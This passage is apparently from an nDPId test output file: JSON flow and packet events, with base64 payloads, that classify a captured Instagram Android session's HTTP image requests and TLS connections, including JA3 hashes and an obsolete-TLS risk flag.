HJvaWQgKDE5LzQuNC4yOyA0ODBkcGk7IDEwODB4MTkyMDsgc2Ftc3VuZzsgR1QtSTk1MDU7IGpmbHRlOyBxY29tOyBpdF9JVCkNCg0K"} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7440000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1436720901262,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-a.ak.instagram.com","url":"photos-a.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11248829_853782121373976_909936934_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720898354,"flow_last_seen":1436720898354,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720898354,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1436720898354,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720898354,"pkt":"ABsv8H60QPMIw47hCABFAAA8TypAAEAGEYLAqABnrfxrBNw+AbsehKWiAAAAAKACOQjaPgAAAgQFtAQCCAoAA+qIAAAAAAEDAwY="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720898386,"flow_last_seen":1436720898386,"flow_idle_time":7560000,"flow_min_l4_payload_len":1365,"flow_max_l4_payload_len":1365,"flow_tot_l4_payload_len":1365,"flow_avg_l4_payload_len":1365,"midstream":1,"thread_ts_msec":1436720898386,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02316{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1436720898386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1431,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1431,"pkt_l4_len":1397,"thread_ts_msec":1436720898386,"pkt":"ABsv8H60QPMIw47hCABFAAWJa5BAAEAGjI7AqABnHw1dNISQAbuIwY4ypNSTmIAYARMTGgAAAQEICgAD6otaUmp7FwMBBVB9SXVyqGN\/Z0IQOrRWeDqy2ESAojaAx4QQZK8Nvn9P2WG4BrAo87sybB9iQ6L07zu3SJx\/yEENym+6oXOIueLurovz4xM5H+e2VkXRxNwq2D0zbcPaARfl1kqZ5lxozT2KxP5upnv5ZlZknUeHJ9iJUeI933878+9Wa2p3jAkSn4v+PhMZ8tdKr\/DbC4Dao9UoiB0NXUAr3Yz5mLZxqwvhp7T5JBYmrpug0k+c+c5jewd+5zMMLlTOh9zrkFpN\/SPdxljY89SWMG4iWok6qAWd81044WQFB8MMk6d1YEgnl4MTRR4s5nra0RAZ\/18nINKDy\/+7OtbIdykHRTDGdkzNglojGhlbMwXwCoSaU7eaC\/UG3QHuANJheRiTxBbb9LObDO61gFXBkdpo\/nFCQJ5DEAR9LRi5VbgUevhOk8v2CnW3NfU8tU\/NhXT2Fwav0PyuAxlku4R0TFjGrX0lMbSi5TfJsyWyqS9JUaHL9+9Lo2MolHMixycuQJ8OBJfxMjbh4vndGe6E5xjywRDhon5Ivpm51kbX7pr85erPPQ5esyd11\/S2GN1nyosTrQfKPFTMJ2PKe2m7QTQt+uAz\/lbUTHbMP5WXngggI0bC1v64BOTbVZvk5uSBRBJTxfNNwpu5Mu42yT2kpORmWxKLjzXxHI3WY0zq00CLVkZ1W4ZdSNXs14xkPKnh8GETvWNyrC0OkJAC\/senhsF4RXOoqIV\/fvDhI7Lz\/aB3VqgZGkZTiT2tG0nkNbTl36TNhCL0NMIpdEkg3CtkeHnRpYXxlFUaqjl0oiNlqmXrT3txeOlkpgLeE8sil6hQeUXLUDxeB\/KJ3hVWQV57tvquoi3TQ0mdlDPh3nKxwFekfGvexzie5JWVEiecROjBicDHlMGZSqgfGOOL9obBhKFQKyGkKwqvDD0GLpn+uVlqpq4HgYehGmZsXkGfKjhOvgYnCN46aHecrF2yix3uKy9HcGVhEh0jdkP6ZVKeYPjfh1VormnzwC798pJrA6FXeukKkQhENaxtIfjtfZqrhxgkGn44Wi6ohn6pe\/FHHmbNcPgV6V8fsqp75GNTcdW4payqjcXiRcbHyE8T1\/Qx4baiJDp6KLsZS4gAneRh+ALhxukKM03jbRUClXAh8oRiLl0u+SOlflfwh8goOCkzbht0yzBBd5s+YE\/rKLvLODamT6vRSajD988ioyLCTi6O7PjCpIz0x86CPfl59RFLMWfW1DDNxLLiQpG5QmdGA\/0xKZPtgucNxJfMg8zisuAsBotSOZNTt7iyYW\/IMjbjZfUDk2XnW0FMevjvN1dNSzxncEScDgEwhOZR\/bPFjnmrDfWVV5x9BRHI5MP8wUwSlhypizc+qxTGIgicImjYGkhAIz+xcFmXadM0YNZEvMZaj9aBOHMX1Oble6EYxmSHOrpQKqfzbWeMlvwrQYuci0kLy\/\/bshVduwlDBy5JYqDunQnZyDGNhNVfyaH+ng8KQ6sBqINnITFXfAnCkwXV\/HK1iUkb7QzoqBn3gpftCp83hNH0foudA8Gdf6kurlWwgMEOXi5BfTqlD4DwASXt9A68u1P9Zz8s0alrX2UlusB6fvL9Q9Js6MLwiQyj+bjdEcQ3Uplwrw6qLdouhHzsdgkMnVdwc2l5wv8KPOcXqmQvqjndZFz1nXaAVhwsFoo1zwY3LiNiYjhwWSYaeCHLdPVBHtAjW1OZFou+zyYe9X36AFhBBqrW+04QrWGvIhn1jD27wWhOa1bAC4ScjrpH0lKPe5njeedOXaKkZFE++EHilCzyFRBq6mDF3sb10u4yUIsQcfD4LLSh"} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1436720898475,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720898475,"pkt":"QPMIw47hABsv8H60CABFAAA05iNAAFUGAlAfDV00wKgAZwG7hJCk1JOYiMGTh4AQAE5t9QAAAQEIClpSq0YAA+qL"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1436720898499,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720898499,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAAFIGTqyt\/GsEwKgAZwG73D5XFMWUHoSlo6ASOJBK1AAAAgQFlgQCCAq8TYT0AAPqiAEDAwg="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1436720898499,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720898499,"pkt":"ABsv8H60QPMIw47hCABFAAA0TytAAEAGEYnAqABnrfxrBNw+AbsehKWjVxTFlYAQAOXaNgAAAQEICgAD6pe8TYT0"} +00981{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720898354,"flow_last_seen":1436720898501,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1436720898501,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"telegraph-ash.instagram.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01299{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1436720898551,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":679,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":679,"pkt_l4_len":645,"thread_ts_msec":1436720898551,"pkt":"QPMIw47hABsv8H60CABFAAKZ5iRAAFUG\/+kfDV00wKgAZwG7hJCk1JOYiMGTh4AYAE6DfwAAAQEIClpSq5UAA+qLFwMBAmB3TNLiDxMdaG\/77FJR8O6B7ETM5PL1YEwRicjM0iP0UHaAjwUM69tZJRboKPSJSylQ1372woiRMUoGT0dkqivXwS77nykGpDpQxH2zG\/qLmXj10Apbm9mNJzojbuGkVAQeXciVaLovJfxV8pe4ApuOMtqX+wzNa0ZzIxrRfdGy1r+REoc96\/duttzeccU7r8F+0sSj4kAMBptpjPxHIWmQ8bvcQmsOZTBbtWqbInBydwnOzZKHuUG4UpWsNoKQLrxSa1ETAsjugoyEe5PPT8+cb8Irh4mKsNfbStX5KDjpe9Dme8aKUCL1ceYHHjALeMY9l4fx2o0KIF6TukGkzvqR8cZ+qcyDG5U\/HYh5lxYTcHS7lDXS1PzV6XOR41h1cZ9L+KxXE6JczRHCSiNT1VF7boI4Qizj5lEdfdajhSQHOEg16UAhsZHpgK1G5Iki1ek6rdWyUqwchJMZYUThaRdJpKv9RM0OW9cAtKW4cZKenq0TEdOPDEBRCwskRboA6Gi3YnhJ3qdvDGkTLGo9t+FpkGczAZZn4gKC4xoEybQb10OFqFb4BP0BHlc1dmzqbYjWeEKW2wJjaNEaqdUvlusDaKzJPAfd\/FC3qcdqBy6RoP1rw6AWfXgFirXb5SF1IsZGaICO7Vi\/A05NBIj2TN+sAkrMTvlnJxzijI3OS4z\/O7pdS0yJ1AhdM2CbNqiTSP1\/fSWG2i895LYIERx7TAiABxyhh9ufac6WLn1D9wJV86snpuHfJEPWipx7pSJs20IjfVBIUe\/onrcoOjL6GotP95FotxVNOdpbLqczmpv1mQ=="} +01033{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720898354,"flow_last_seen":1436720898646,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":609,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1436720898646,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"telegraph-ash.instagram.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"acb741bcdffb787c5a52654c78645bdf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} +00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":49,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720898386,"flow_last_seen":1436720900498,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":19727,"flow_avg_l4_payload_len":616,"midstream":1,"thread_ts_msec":1436720900498,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720898386,"flow_last_seen":1436720900498,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":19727,"flow_avg_l4_payload_len":616,"midstream":1,"thread_ts_msec":1436720900498,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900684,"flow_last_seen":1436720900684,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720900684,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00819{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1436720900684,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":326,"pkt_l4_len":292,"thread_ts_msec":1436720900684,"pkt":"ABsv8H60QPMIw47hCABFAAE4wXBAAEAGQn\/AqABnLiFGoJegAFCP9SVkp0jV34AYH+olJAAAAQEICgAD63Ga3vWjR0VUIC9ocGhvdG9zLWFrLXhhcDEvdDUxLjI4ODUtMTUvZTM1LzEwODU5OTk0XzEwMDk0MzM3OTI0MzQ0NDdfMTYyNzY0NjA2Ml9uLmpwZz9zZT03IEhUVFAvMS4xDQpIb3N0OiBwaG90b3MtaC5hay5pbnN0YWdyYW0uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBJbnN0YWdyYW0gNy4xLjEgQW5kcm9pZCAoMTkvNC40LjI7IDQ4MGRwaTsgMTA4MHgxOTIwOyBzYW1zdW5nOyBHVC1JOTUwNTsgamZsdGU7IHFjb207IGl0X0lUKQ0KDQo="} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900684,"flow_last_seen":1436720900684,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720900684,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-h.ak.instagram.com","url":"photos-h.ak.instagram.com\/hphotos-ak-xap1\/t51.2885-15\/e35\/10859994_1009433792434447_1627646062_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900687,"flow_last_seen":1436720900687,"flow_idle_time":7560000,"flow_min_l4_payload_len":253,"flow_max_l4_payload_len":253,"flow_tot_l4_payload_len":253,"flow_avg_l4_payload_len":253,"midstream":1,"thread_ts_msec":1436720900687,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00810{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1436720900687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":319,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":319,"pkt_l4_len":285,"thread_ts_msec":1436720900687,"pkt":"ABsv8H60QPMIw47hCABFAAEx0CVAAEAGO5vAqABnUlUaouJQAFA6kgvvKZIczIAYH0cqkQAAAQEICgAD63FWCuc2R0VUIC9ocGhvdG9zLWFrLXhhZjEvdDUxLjI4ODUtMTUvZTE1LzExMzg2NTI0XzExMDI1NzYxOTMxNzQzMF8zNzk1MTM2NTRfbi5qcGcgSFRUUC8xLjENCkhvc3Q6IHBob3Rvcy1nLmFrLmluc3RhZ3JhbS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEluc3RhZ3JhbSA3LjEuMSBBbmRyb2lkICgxOS80LjQuMjsgNDgwZHBpOyAxMDgweDE5MjA7IHNhbXN1bmc7IEdULUk5NTA1OyBqZmx0ZTsgcWNvbTsgaXRfSVQpDQoNCg=="} +00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900687,"flow_last_seen":1436720900687,"flow_idle_time":7560000,"flow_min_l4_payload_len":253,"flow_max_l4_payload_len":253,"flow_tot_l4_payload_len":253,"flow_avg_l4_payload_len":253,"midstream":1,"thread_ts_msec":1436720900687,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e15\/11386524_110257619317430_379513654_n.jpg","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900690,"flow_last_seen":1436720900690,"flow_idle_time":7560000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900690,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1436720900690,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":325,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":325,"pkt_l4_len":291,"thread_ts_msec":1436720900690,"pkt":"ABsv8H60QPMIw47hCABFAAE3v7dAAEAGS+vAqABnUlUauq1bAFCj1oFKfMvpWoAYDTz8dgAAAQEICgAD63JUYaBjR0VUIC9ocGhvdG9zLWFrLXhhZjEvdDUxLjI4ODUtMTUvZTM1LzExMzc5MTQ4XzE0NDkxMjAyMjg3NDUzMTZfNjA3NDc3OTYyX24uanBnP3NlPTcgSFRUUC8xLjENCkhvc3Q6IHBob3Rvcy1lLmFrLmluc3RhZ3JhbS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEluc3RhZ3JhbSA3LjEuMSBBbmRyb2lkICgxOS80LjQuMjsgNDgwZHBpOyAxMDgweDE5MjA7IHNhbXN1bmc7IEdULUk5NTA1OyBqZmx0ZTsgcWNvbTsgaXRfSVQpDQoNCg=="} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900690,"flow_last_seen":1436720900690,"flow_idle_time":7560000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900690,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900692,"flow_last_seen":1436720900692,"flow_idle_time":7560000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900692,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1436720900692,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":325,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":325,"pkt_l4_len":291,"thread_ts_msec":1436720900692,"pkt":"ABsv8H60QPMIw47hCABFAAE3iBFAAEAGg5LAqABnUlUaueJtAFAE8EMOWjfyZYAYD+bdMQAAAQEICgAD63JZ6ogYR0VUIC9ocGhvdG9zLWFrLXhmYTEvdDUxLjI4ODUtMTUvZTM1LzExNDI0NjIzXzE2MDgxNjMxMDk0NTA0MjFfNjYzMzE1ODgzX24uanBnP3NlPTcgSFRUUC8xLjENCkhvc3Q6IHBob3Rvcy1mLmFrLmluc3RhZ3JhbS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEluc3RhZ3JhbSA3LjEuMSBBbmRyb2lkICgxOS80LjQuMjsgNDgwZHBpOyAxMDgweDE5MjA7IHNhbXN1bmc7IEdULUk5NTA1OyBqZmx0ZTsgcWNvbTsgaXRfSVQpDQoNCg=="} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900692,"flow_last_seen":1436720900692,"flow_idle_time":7560000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900692,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-f.ak.instagram.com","url":"photos-f.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11424623_1608163109450421_663315883_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} +02377{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1436720900716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900716,"pkt":"QPMIw47hABsv8H60CABFAAW+uH1AADkGTewuIUagwKgAZwBQl6CnSNXfj\/UmaIAQAiku5gAAAQEICprfPdsAA+txSFRUUC8xLjEgMjAwIE9LDQpMYXN0LU1vZGlmaWVkOiBTYXQsIDExIEp1bCAyMDE1IDE2OjU3OjA4IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogMTUwMDMxDQpDYWNoZS1Db250cm9sOiBuby10cmFuc2Zvcm0sIG1heC1hZ2U9MTIwOTYwMA0KRXhwaXJlczogU3VuLCAyNiBKdWwgMjAxNSAxNzowODoyMCBHTVQNCkRhdGU6IFN1biwgMTIgSnVsIDIwMTUgMTc6MDg6MjAgR01UDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/+0AfFBob3Rvc2hvcCAzLjAAOEJJTQQEAAAAAABfHAIoAFpGQk1EMjMwMDA5NjkwMTAwMDBjMzQ3MDAwMDEzNjQwMDAwNjM4NDAwMDA4MzJiMDEwMDBiODUwMTAwODdkZjAxMDAwZDRhMDIwMDlkYTIwMjAwNzY3MzAzMDAA\/9sAQwAGBgYGBgYLBgYLEAsLCxAVEBAQEBUbFRUVFRUbIBsbGxsbGyAgICAgICAgJycnJycnLS0tLS0zMzMzMzMzMzMz\/9sAQwEICAgNDA0WDAwWNSQeJDU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1\/8IAEQgEDwQPAwEiAAIRAQMRAf\/EABwAAAEFAQEBAAAAAAAAAAAAAAUBAgMEBgAHCP\/EABoBAAMBAQEBAAAAAAAAAAAAAAABAgMEBQb\/2gAMAwEAAhADEAAAANnYrv6OWePnpwvl4Ucr5ZqutmsxzGNFZbBKECWI2oX8gp+rqOdscgJarTJrPTiAtUZEnHz0qOljcEskD1c01Rksi2ko7C10FaSJqLDY0bkkglRK+J01IqIm99eIL6jmheWgjCKVJUTsjcmxJXNVG3K1KNr3irtvMCithKVbraoq9cQKb5mse+vydpRzhEXinDIvFyoIspSDsdW4LfVORbSFGS9z0Q07Vapihe24SRFCV8D5p7U4fInJNSacY9CnDoLekTpOusTppdQVRUWk5Z3S6nSOaiisOZWrWqtSjFjqVjcxzA+ktxbdV5FmYfOO1PR5O6tOVN6dGCvruavqOenPG2AT0hWptvhfNzvglTijkaS2WB9FlYElvdXcE7qNkc6sYnO6nwWWwvB6cwHJ3BI+Pk7LqzU7SQPCRiRBzWw1M8o9Wr7h8yd2Yes0RUdMne6nInZbXUcjq0gpefEOw6FZdhsSpo1\/NNSRGRwz8KussbUKdHc9LXYK7JQkHbZE9CMRrLHVuCy6tIhIp+ajbOxDZOaN8kM6b52TRosiOmpWqktXN4fR9WcyxQQ3Mi1m1NxKzxO57gjldCOau1Guh6KocxG0s90jNuePlRqSaiqL7xrhlZBD1ROCogrq0VC86jwXI66CmfUcy84e5MlIKemSZRcnZWo5lqOCIVpafMuyjnIKtHOmrjanNWmV0at9VUdla